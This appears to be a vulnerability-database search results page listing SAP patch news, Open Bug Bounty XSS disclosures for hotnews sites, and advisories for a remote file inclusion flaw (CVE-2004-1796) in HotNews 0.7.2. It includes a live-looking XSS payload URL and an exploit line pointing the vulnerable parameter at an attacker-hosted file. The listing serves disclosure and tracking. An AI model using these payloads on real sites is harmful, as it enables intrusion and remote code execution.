20 matches found
SAP Kicks Log4Shell Vulnerability Out of 20 Apps
SAP has identified 32 apps that are affected by CVE-2021-44228 – the critical vulnerability in the Apache Log4j Java-based logging library that’s been under active attack since last week. As of yesterday, Patch Tuesday, the German software maker reported that it’s already patched 20 of those apps...
Vulnerabilities fixed in SAP products
Vulnerabilities have been fixed in SAP products. The vulnerabilities enable a malicious person to launch attacks that lead to the following categories of damage: Cross-Site Scripting (XSS); Denial-of-Service (DoS); Circumvention of security measure; Remote code execution; User rights; Access to system...
SAP Patches Nine Critical & High-Severity Bugs
SAP has released 19 new and updated security patches, three of them rated as “HotNews” critical and six as high-priority. “HotNews” is the severity rating that SAP gives to critical vulnerabilities. Two of this month’s sizzlers have a CVSS score of 9.9 and affect SAP Business One and SAP NetWeave...
hotnews.ro XSS vulnerability
Open Bug Bounty ID: OBB-452158

Description | Value
---|---
Affected Website: | hotnews.ro
Vulnerable Application: | Custom Code
Vulnerability Type: | XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score: | 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Remediation Guide: | OWASP XSS Prevention Cheat Sheet...
hotnews.bg XSS vulnerability
Vulnerable URL: http://www.hotnews.bg/search/%22%3E%3Csvg%20onload=alert%22OPENBUGBOUNTY%22%3E

Details:

Description | Value
---|---
Patched: | No
Latest check for patch: | 06.12.2017
Vulnerability type: | XSS
Vulnerability status: | Publicly disclosed
Alexa Rank | 55115
VIP website status: | No...
HotNews 0.x hotnews-engine.inc.php3 config[header] Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the contex...
HotNews 0.x config[incdir] Parameter Remote File Inclusion
No description provided by source...
HotNews 0.7.2 - Remote File Inclusion
No description provided by source.
HotNews 0.7.2 Remote File Inclusion
HotNews 0.7.2 Remote File Inclusion Vulnerability
No description provided by source. HotNews 0.7.2 Remote File Inclusion Vulnerability. Bugs Found by teamelite | http://manadocoding.net | http://www.gcc.web.id/ | Exploit: - http://target/path/includes/hnmain.inc.php3?configincdir=attacker.com/cmd.gif??? Greetz and Thanks to: All...
HotNews 0.7.2 Remote File Inclusion
Exploit for php platform in category web applications
HotNews 0.7.2 - Remote File Inclusion
HotNews 0.7.2 - Remote File Inclusion
CVE-2004-1796
CVE-2004-1796 concerns a PHP remote file inclusion vulnerability in HotNews 0.7.2 and earlier. The flaw allows an attacker to execute arbitrary PHP code by supplying manipulated values to either the config[header] parameter in hotnews-engine.inc.php3 or the config[incdir] parameter in hnmain.inc....
CVE-2004-1796
PHP remote file inclusion vulnerability in HotNews 0.7.2 and earlier allows remote attackers to execute arbitrary PHP code via the (1) config[header] parameter to hotnews-engine.inc.php3 or (2) config[incdir] parameter to hnmain.inc.php3...
CVE-2004-1796
PHP remote file inclusion vulnerability in HotNews 0.7.2 and earlier allows remote attackers to execute arbitrary PHP code via the (1) config[header] parameter to hotnews-engine.inc.php3 or (2) config[incdir] parameter to hnmain.inc.php3...
HotNews arbitrary file inclusion
HotNews arbitrary file inclusion. Product: HotNews. Version: = v0.7.2. Vendor: http://sourceforge.net/projects/hotnews/. Bug discovered by: Officerrr. Vendor Response: Not contacted yet. Problem 1: Attacker can include a...
HotNews 0.x - config[incdir] Remote File Inclusion
HotNews 0.x - config[incdir] Remote File Inclusion. source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently execute...
HotNews Multiple Script Remote File Inclusion
The remote host is running HotNews, a set of PHP scripts designed to set up a news system for web pages. It is possible to use this suite to make the remote host include PHP files hosted on a third-party server. An attacker may use this flaw to inject arbitrary code in the remote host and gain a shell wi...
HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion
source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the...